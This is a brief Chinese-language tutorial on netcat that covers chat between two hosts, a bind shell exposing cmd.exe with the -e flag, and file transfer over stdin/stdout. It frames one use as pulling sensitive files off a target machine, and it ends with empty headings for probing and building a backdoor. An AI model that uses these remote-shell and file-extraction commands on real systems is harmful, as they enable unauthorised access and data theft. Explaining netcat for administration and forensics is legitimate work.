基于tcp/ip协议（c/s模型的）的“瑞士军刀”

image.png

基本功能

• 仅可以聊天

# 创建一个服务器端方法
# nc -l -p [localport]
nc -l -p 4444
# 创建一个客户端方法（链接服务器端）
# nc [remote_addr] [remoteport]
nc 192.168.1.102 4444

• 返回shell的功能-- ssh 不能用的时候是不是很爽

# 创建一个服务器端方法：
nc -l -p [localport] -e cmd.exe
# 创建一个客户端方法（连接服务器端）：
nc [remote_addr] [remoteport]

文件传输

使用场景
1、取证
目标机器被黑客攻击后，取证热源可以利用nc的文件传输功能来获取目标机器上的文件内容，避免直接在目标机器上进行操作造成取证误差
2、单纯获取目标机器上敏感文件
当目标机器上有一些文件内容，无法正常下载时，可以利用nc进行文件传输

为什么可以利用nc进行文件传输呢？
nc中的数据传输，使用的是标准的输入、输出流，所以可以直接利用命令行来进行操作

使用方法

• 客户端传文件到服务器端

# 创建一个服务器端方法
nc -l -p [localport] > outfile
# 创建一个客户端方法（链接服务器端）：
nc [remote_addr] [remoteport] < infile

• 服务器端向客户端传输数据

# 创建一个服务器端方法：
nc -l -p [localport] < infile
# 创建一个客户端方法（连接服务器）：
nc [remote_addr] [remoteport] > outfile

设置超时时间 -w 参数 避免nc假死

信息探测

建立后门